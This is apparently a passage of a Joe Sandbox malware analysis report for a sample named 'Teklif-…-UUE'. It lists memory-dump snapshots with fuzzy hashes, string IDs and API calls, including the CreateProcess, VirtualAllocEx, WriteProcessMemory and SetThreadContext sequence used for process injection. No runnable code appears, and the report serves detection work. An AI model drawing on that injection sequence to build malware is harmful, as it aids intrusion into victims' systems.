                                                          • Opcode Fuzzy Hash: a98bf664ab6d7d199571625581d0cf0950569c5aca94ba36f101e65c0cf8dc14
                                                          • Instruction Fuzzy Hash: 82119274905269CFDB61CF54C884BD8BBB1EB19304F1085D9E58DA7250DBB19EC9CF00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: )$6
                                                          • API String ID: 0-4136620098
                                                          • Opcode ID: a5b855abee4cf7bb3169c0feb8d942621f5673b59b4f9969359541baabc0ae19
                                                          • Instruction ID: 8cb36cbe79cbba10a561e4a5b9cbaba965c860b0c0e58c383270a2aba062b6c0
                                                          • Opcode Fuzzy Hash: a5b855abee4cf7bb3169c0feb8d942621f5673b59b4f9969359541baabc0ae19
                                                          • Instruction Fuzzy Hash: C4F0DAB090012A8FDB64EF54D488BAA7BB6EB44304F1088E8D119A3641DA755EC59F55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq
                                                          • API String ID: 0-3092978723
                                                          • Opcode ID: b2f314d036795bddbccf6e0464849955c41213708d35b01b75c26175195968ba
                                                          • Instruction ID: 6c550eb7bbd9fd4ad643005e84640eb0f2f8a2c576ae086b402e293a95225608
                                                          • Opcode Fuzzy Hash: b2f314d036795bddbccf6e0464849955c41213708d35b01b75c26175195968ba
                                                          • Instruction Fuzzy Hash: 98523A75A002288FDB64DF68C985BEDBBF6BF88300F1544D9E549AB351DA309E80CF61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (_]q
                                                          • API String ID: 0-188044275
                                                          • Opcode ID: aa8c1fd34295f18fe0a1272297475c59cbddb868054118df20b1a13db6f0b430
                                                          • Instruction ID: ff2262f878a5e3ca45cf48a2045df4861ce376e6f114564aaec44bbcfb9e9a0c
                                                          • Opcode Fuzzy Hash: aa8c1fd34295f18fe0a1272297475c59cbddb868054118df20b1a13db6f0b430
                                                          • Instruction Fuzzy Hash: C6225D35A00214DFDB04DFA8D495AADB7F6FF88300F168469E906AB3A1DB71ED41CB90
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0598E7D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 0136a848d7b4faab23759a7861a38f3342ab96b88f359e4414e7dc3d26f1a7ca
                                                          • Instruction ID: fe2fcaf4bdf4c6fec400e6ae7282bc88ee7bac39e91e7006a70ba2734994daa8
                                                          • Opcode Fuzzy Hash: 0136a848d7b4faab23759a7861a38f3342ab96b88f359e4414e7dc3d26f1a7ca
                                                          • Instruction Fuzzy Hash: 17A13470D00219DFDB10DFA9C895BEDBBB5FF09304F14916AE859A7280DB789985CF81
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0598E7D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0598F0BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0598F0BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0598EF32
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0598EF32
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0598F57C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0598F57C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 05A0D63C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232473759.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5a00000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0598E9D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0598E9D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <dtq
                                                          • API String ID: 0-3090548385
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJbq
                                                          • API String ID: 0-1760495472
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p<]q
                                                          • API String ID: 0-1327301063
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05A0E7FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232473759.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5a00000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2230984646.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57c0000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: ab81c603d26fd6d18495e4eac8f08f88e9b4d9f0809fa7e27422399177eac937
                                                          • Instruction ID: dcd32d0db4f67bca0ebacd579596c3096a687b6a3dfdcb4c80f79967e9ced3a5
                                                          • Opcode Fuzzy Hash: ab81c603d26fd6d18495e4eac8f08f88e9b4d9f0809fa7e27422399177eac937
                                                          • Instruction Fuzzy Hash: 6D318B74D08259CFDB19CFA9D8086FEBFB2EB45300F0480AED015A7292C7386986DF81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "
                                                          • API String ID: 0-123907689
                                                          • Opcode ID: 3271bc5ec847717f8fe58bc3a562433b790bbf4373c136a102940cb62618b01a
                                                          • Instruction ID: cdf8f2729c3e015a247aa3b666defbcbd626ffd84eab8cd7679e2320d61de50b
                                                          • Opcode Fuzzy Hash: 3271bc5ec847717f8fe58bc3a562433b790bbf4373c136a102940cb62618b01a
                                                          • Instruction Fuzzy Hash: FC215E74A05268CFDB60CF64C988BE9BBB2AB89305F1495DAD50DAB350DB719EC5CF00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &
                                                          • API String ID: 0-1010288
                                                          • Opcode ID: ca22771a4ce0c1003eb24d25e02c1c9ba0c0b2e69052bef2f66dfe4e47c74911
                                                          • Instruction ID: c440c6d644b7e97e8546f5f53ab92cd051b12aa2a244052ecb4c904e6a22a887
                                                          • Opcode Fuzzy Hash: ca22771a4ce0c1003eb24d25e02c1c9ba0c0b2e69052bef2f66dfe4e47c74911
                                                          • Instruction Fuzzy Hash: 4621A374A402288FCBA8DF29C855BDABBB1BF49305F1085EAD94AE7350DB745E81CF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: abc6854250ca62622bd73fabfe0cf291ee00f243579e68b120288bc9a615307d
                                                          • Instruction ID: 551faeda14e9f92b96cec20c3662236d7b121f8668f7d2e5d61ed83a687f39b8
                                                          • Opcode Fuzzy Hash: abc6854250ca62622bd73fabfe0cf291ee00f243579e68b120288bc9a615307d
                                                          • Instruction Fuzzy Hash: 96119F74905269CFCB60DF28D988B9CB7F2EB48305F2484DAD40EB7251EB759A89CF04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 814d91696995bdcf4e38f5f347e765c174e4191c1c9f6f4100f10c1519768640
                                                          • Instruction ID: 673696d1992363683885eba0279a600e8e456c6c24db998c35a2b86394451c48
                                                          • Opcode Fuzzy Hash: 814d91696995bdcf4e38f5f347e765c174e4191c1c9f6f4100f10c1519768640
                                                          • Instruction Fuzzy Hash: D5010074A02218DFCB14EF68D885B9DBBF2EF4A314F104899E949A7351CB309E80CF02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :
                                                          • API String ID: 0-336475711
                                                          • Opcode ID: 998d697464ddfca3d42fcb741b2189e627abe68b9978d903569d3e8890c06a2e
                                                          • Instruction ID: de873fdaf9a3f90d7e6ae732eb82f9d35df16f42b3260ddc39835bd73663ace5
                                                          • Opcode Fuzzy Hash: 998d697464ddfca3d42fcb741b2189e627abe68b9978d903569d3e8890c06a2e
                                                          • Instruction Fuzzy Hash: 8B01BD74A46228DFEB65CF64C884B98BBB2FB09300F1091DAD50DB7280DB729E85CF00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l
                                                          • API String ID: 0-2517025534
                                                          • Opcode ID: 5f0b16c99645106378aa8bb4ae8029b22d3b14520d3d74efb4683d004243dc6d
                                                          • Instruction ID: 5d59d0ce88c3477a154660be5321c21080c53d2f1de3e5560655798dce8e6a52
                                                          • Opcode Fuzzy Hash: 5f0b16c99645106378aa8bb4ae8029b22d3b14520d3d74efb4683d004243dc6d
                                                          • Instruction Fuzzy Hash: 2CF0AF7491222CCFEB60DF64C889B9DBBB1BB08365F2095A9D809A6250DB345D808F11
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          • Opcode ID: 96a3680731180b6a1afd274e6f5f0436ba9792223b0f9520b65bef2626679875
                                                          • Instruction ID: c7b464af7ac3423863f3889ff860fb2d66811961deaec2a068280aa682bd013f
                                                          • Opcode Fuzzy Hash: 96a3680731180b6a1afd274e6f5f0436ba9792223b0f9520b65bef2626679875
                                                          • Instruction Fuzzy Hash: 8CF01C3190061A9BCF11AF54C8106E9F772FF89304F108685EA4927210DB30AAA5DF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15c21921016db556279f74319f92fbf782b30e1a3f667745d22b69bad4f20c90
                                                          • Instruction ID: 49438e176d641a8f36d0a2ea02a60a615529b262b2dd007ef383da6c0f78d572
                                                          • Opcode Fuzzy Hash: 15c21921016db556279f74319f92fbf782b30e1a3f667745d22b69bad4f20c90
                                                          • Instruction Fuzzy Hash: E012D734B00219CFCB14EF64C995AADB7B6BF89300F5185A8E54AAB365DB70ED85CF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f588365b0721527b66f025349fb51e31f75c19617f4bbb9166222e46f5189297
                                                          • Instruction ID: f12c1ec7007f5e221d65812bf1374fcb6ff849f4347f95666fc7a3bb1a7f639e
                                                          • Opcode Fuzzy Hash: f588365b0721527b66f025349fb51e31f75c19617f4bbb9166222e46f5189297
                                                          • Instruction Fuzzy Hash: 54F0E53440E388DFC306CB78CC51199BFB59F47204F1881EAD8445B353C6325907DB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec7f821707b569b2ab0213937a35744ffb440a70a4056631f99c6ea50129f9aa
                                                          • Instruction ID: 5eb7323c4bf473d6fdf2fbbbaf1373dc4359de8ce538f2055eddab4300d0c7f0
                                                          • Opcode Fuzzy Hash: ec7f821707b569b2ab0213937a35744ffb440a70a4056631f99c6ea50129f9aa
                                                          • Instruction Fuzzy Hash: 53E1E370A04218CFDB54EF68D994BADBBF6FB8A304F1480AAE409AB355DB305D85CF15
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: effbeac024b5dcc06f197bff1d37a68c46f610687b7abdc8c738ef283e56a95c
                                                          • Instruction ID: 21a371031942ceaac5561bedc3d926233871b34f102d186b7857cb6099035063
                                                          • Opcode Fuzzy Hash: effbeac024b5dcc06f197bff1d37a68c46f610687b7abdc8c738ef283e56a95c
                                                          • Instruction Fuzzy Hash: 82E1D270A00218CFDB54EF68D994BADBBF6FB8A304F1480AAE409AB355DB345D85CF15
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76d38ac67b76a3fce9aaabcf6c0bc48243ccd92f2123e2fcf0dc1be890fbc41d
                                                          • Instruction ID: 4b38ac513ed5d8d080223ae0472d9fa6f259bc8b02759a03ca141305b9b989fe
                                                          • Opcode Fuzzy Hash: 76d38ac67b76a3fce9aaabcf6c0bc48243ccd92f2123e2fcf0dc1be890fbc41d
                                                          • Instruction Fuzzy Hash: D4E1D170A05218CFDB54EF68D894BADBBF6FB8A304F1480AAE409AB355DB345D85CF14
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 799ac74a9b34398b4d1356c1e600d7a0febdf57d9b67fb1784ccf9df6514fc51
                                                          • Instruction ID: f50404d992a2e8d2f19344cbb8f94296a85d1302c46e225a7c55edbf9ada577c
                                                          • Opcode Fuzzy Hash: 799ac74a9b34398b4d1356c1e600d7a0febdf57d9b67fb1784ccf9df6514fc51
                                                          • Instruction Fuzzy Hash: AEC1C270A05228CFDB64DF28D958BE9BBF6FB4A304F1095E9D409A7254CB749E88CF05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd497d1baf223930ecc4d0561a34d6562bff291f648393798e91331ad0c7373c
                                                          • Instruction ID: d096de65e260e91c692358d12a90d5e1576e3508f1bc5e6319919b26d06ce83f
                                                          • Opcode Fuzzy Hash: cd497d1baf223930ecc4d0561a34d6562bff291f648393798e91331ad0c7373c
                                                          • Instruction Fuzzy Hash: 5DA10A34B00215CFDB14DF64C995BA9BBB6BF89300F5085A8E44AAB365DF70AD85CF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2da6b5cb3cff24380616c4ee2629896ead2aa80582e1d0c824b517ffb749c29c
                                                          • Instruction ID: 5f2b2dff9f27a95b3192221d6da7b0acf57b11e755bfa6b400f23122e008b322
                                                          • Opcode Fuzzy Hash: 2da6b5cb3cff24380616c4ee2629896ead2aa80582e1d0c824b517ffb749c29c
                                                          • Instruction Fuzzy Hash: 4E812B34710614DFCB14DF68D899A6DBBBABF89710F1485A9E506DB3A1CB30ED41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9366c8d82a6ea38fcb49804db78df610935abf0942988b6290c138dd4bfd941
                                                          • Instruction ID: 88d9c5e66a7a225768e19e4e79c75e8d65d1236f978671f97fadaacd044b7b9d
                                                          • Opcode Fuzzy Hash: c9366c8d82a6ea38fcb49804db78df610935abf0942988b6290c138dd4bfd941
                                                          • Instruction Fuzzy Hash: 31813735A01208DFDB05DFA5D959AADBBF6FF88311F148069E902AB390DB39DD42CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b38976c07f95ee4f2d6e6497773f023dafb1104e21fb2678093cca8592b8c36
                                                          • Instruction ID: 614764b27917abd8703fcdf3eecebb75c0774cb66c8de67ff5246a26c06a927f
                                                          • Opcode Fuzzy Hash: 5b38976c07f95ee4f2d6e6497773f023dafb1104e21fb2678093cca8592b8c36
                                                          • Instruction Fuzzy Hash: 89A11574E01218CFDB54DFA8D544BADBBF2FB4A304F2494A9D40AAB255CB345E89CF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
